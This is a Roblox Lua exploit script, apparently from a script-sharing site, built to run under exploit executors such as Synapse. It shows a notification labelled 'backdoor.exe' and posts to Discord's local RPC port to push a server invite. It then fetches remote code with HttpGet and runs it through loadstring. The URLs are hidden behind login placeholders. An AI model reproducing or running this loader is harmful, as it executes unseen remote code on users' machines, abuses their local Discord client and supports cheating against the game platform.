local httpService = game:GetService("HttpService");

local invCode = "xJHCqm84cW";
local httpRequest = (syn and syn.request) or http_request or function() end;

local function launchDiscord()
	if not httpRequest then warn("Exploit not supported. No HTTP found.") return end
	
	httpRequest({
		Url = "http://[Log in to view URL]:6463/rpc?v=1",
		Method = "POST",
	
		Headers = {
			['Content-Type'] = 'application/json',
			Origin = 'https://[Log in to view URL]'
		},
	
		Body = httpService:JSONEncode({
			cmd = 'INVITE_BROWSER',
			nonce = httpService:GenerateGUID(false),
			args = {code = invCode}
		})
	})
end;

local NotificationBindable = Instance.new("BindableFunction")
NotificationBindable.OnInvoke = launchDiscord

game:GetService("StarterGui"):SetCore(
	"SendNotification",
	{
		Title = "backdoor.exe",
		Duration = 5,
		Text = "Loading lastest version!\n\nJoin our Discord for games, scripts and more \ revamped \ ",
		Button1 = "Join Discord!",
		Callback = NotificationBindable
	}
)

loadstring(game:HttpGet("https://[Log in to view URL]"))();



--	k5scripts
--	.------.
--	|5.--. |
--	| :│/: |
--	| :│\: |
--	| '--'5|
--	`------'

Embed on website

To embed this project on your website, copy the following code and paste it into your website's HTML: